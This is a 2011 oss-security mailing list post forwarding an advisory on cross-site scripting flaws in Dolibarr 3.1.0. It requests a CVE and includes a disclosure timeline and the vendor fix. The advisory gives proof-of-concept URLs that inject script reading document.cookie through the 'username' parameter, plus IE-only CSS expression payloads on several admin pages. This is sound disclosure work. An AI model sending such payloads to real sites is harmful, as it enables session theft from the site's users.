oss-security - Fwd: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0

Follow @Openwall on Twitter for new release announcements and other news

[<prev] [next>] [thread-next>] [day] [month] [year] [list]

Message-ID: <20111121092944.GA16253@foo.fgeek.fi>
Date: Mon, 21 Nov 2011 11:29:44 +0200
From: Henri Salo <henri@...v.fi>
To: oss-security@...ts.openwall.com
Subject: Fwd: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr
 3.1.0

Can I get CVE-identifier for this issue, thank you? I verified from infoserve.de that they haven't already requested one.

Best regards,
Henri Salo

----- Forwarded message from security@...oserve.de -----

Date: Wed, 9 Nov 2011 09:59:18 GMT
From: security@...oserve.de
To: bugtraq@...urityfocus.com
Subject: Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
X-Mailer: MIME-tools 5.420 (Entity 5.420)

Advisory:               Multiple Cross-Site-Scripting vulnerabilities in Dolibarr 3.1.0
Advisory ID:           	INFOSERVE-ADV2011-03
Author:                	Stefan Schurtz
Contact:		security@...oserve.de
Affected Software:  	Successfully tested on Dolibarr 3.1.0 other versions may also be affected
Vendor URL:          	http://www.dolibarr.org/
Vendor Status:       	fixed in the 3.1 branch

==========================
Vulnerability Description
==========================

Dolibarr 3.1.0 is prone to multiple XSS vulnerability

==================
PoC-Exploit
==================

Cross-Site-Scripting - parameter 'username'

http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</script><script>alert(document.cookie)</script>
http://<target>/admin/company.php?mainmenu=home&leftmenu=setup&username='"</script><script>alert(document.cookie)</script>&=3&optioncss=print

IE-only

http://<target>/admin/security_other.php/" stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/events.php/" stYle="x:expre/**/ssion(alert(document.cookie))
http://<target>/admin/user.php/" stYle="x:expre/**/ssion(alert(document.cookie))

=========
Solution:
=========

Fixed in the 3.1 branch

====================
Disclosure Timeline:
====================

08-Nov-2011 - vendor informed
09-Nov-2011 - vendor fix in the 3.1 branch
 
========
Credits:
========

Vulnerabilities found and advisory written by INFOSERVE Security Team

===========
References:
===========

https://doliforge.org/tracker/?func=detail&aid=232&group_id=144
https://github.com/Dolibarr/dolibarr/commit/762f98ab4137749d0993612b4e3544a4207e78a1
http://www.dolibarr.org/
http://www.infoserve.de/

----- End forwarded message -----

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.